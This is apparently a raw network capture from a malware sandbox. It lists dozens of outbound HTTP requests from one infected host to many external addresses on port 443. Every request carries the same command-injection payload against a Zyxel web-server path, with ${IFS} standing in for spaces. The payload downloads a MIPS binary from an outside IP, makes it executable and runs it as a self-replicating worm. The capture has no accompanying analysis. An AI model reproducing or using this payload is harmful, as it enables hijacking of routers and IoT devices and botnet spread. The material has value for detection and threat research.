                                            Jan 14, 2024 15:50:36.357260942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3450192.168.2.2349386202.46.254.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357336044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3451192.168.2.2339018208.201.214.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357362986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3452192.168.2.235364445.108.133.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357379913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3453192.168.2.233807059.120.44.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357424974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3454192.168.2.23531202.235.93.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357475996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3455192.168.2.234443878.174.244.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357501984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3456192.168.2.234360642.52.198.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357532978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3457192.168.2.234494836.237.75.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357552052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3458192.168.2.2347556115.180.153.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357585907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3459192.168.2.2343246189.38.205.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357649088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3460192.168.2.2348594188.137.21.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357665062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3461192.168.2.2333140201.122.57.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357713938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3462192.168.2.233304665.138.100.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357763052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3463192.168.2.235875665.141.137.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357774019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3464192.168.2.2338334146.9.92.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357791901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3465192.168.2.23489229.11.172.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357862949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3466192.168.2.2347314149.10.242.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357913971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3467192.168.2.2342024168.211.221.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357933998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3468192.168.2.2352764173.228.51.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.357960939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3469192.168.2.2358770151.43.154.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.358017921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3470192.168.2.2355950217.87.8.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.358048916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3471192.168.2.2345402116.45.79.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.358098030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3472192.168.2.2349096118.228.195.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.358119011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3473192.168.2.233586823.141.158.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.358156919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3474192.168.2.2341066161.86.60.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.358186007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3475192.168.2.234594895.58.193.127443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.360316038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3476192.168.2.2343428152.111.107.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.360362053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3477192.168.2.2339510149.169.33.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.360388041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3478192.168.2.2339536143.108.132.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.360435009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3479192.168.2.2358584193.135.187.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.360476017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3480192.168.2.2358112119.131.144.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.360512972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3481192.168.2.2355472213.108.161.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.360529900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3482192.168.2.2337070175.123.138.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.360580921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3483192.168.2.234090843.125.250.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.360620975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3484192.168.2.235224632.48.158.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.360629082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3485192.168.2.234393879.205.54.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362183094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3486192.168.2.23514268.95.2.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362209082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3487192.168.2.233913274.143.141.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362252951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3488192.168.2.23413504.229.198.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362274885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3489192.168.2.2335742164.47.226.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362307072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3490192.168.2.2340176164.108.108.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362332106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3491192.168.2.2341108158.89.217.149443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362369061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3492192.168.2.235055067.123.14.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362396002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3493192.168.2.234584031.144.230.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362436056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3494192.168.2.236028074.142.85.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362466097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3495192.168.2.2341410164.8.205.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362502098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3496192.168.2.2350800176.93.186.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362541914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3497192.168.2.233810467.234.82.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362550974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3498192.168.2.235291863.228.168.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362590075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3499192.168.2.2360860139.93.237.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362606049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3500192.168.2.2350104130.156.139.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362622976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3501192.168.2.235251637.78.217.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362656116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3502192.168.2.2358766193.161.89.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362694979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3503192.168.2.2337290160.121.95.212443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362704039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3504192.168.2.2358266141.15.29.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362724066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3505192.168.2.2349394182.171.30.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362760067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3506192.168.2.234018878.91.45.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362762928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3507192.168.2.2336648105.50.175.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362823963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3508192.168.2.2347936176.44.214.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362826109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3509192.168.2.2353780207.212.32.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362879992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3510192.168.2.2340184104.72.118.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.362912893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3511192.168.2.234232668.160.157.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:36.363014936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3512192.168.2.2347074221.196.223.178443
                                            TimestampBytes transferredDirectionData
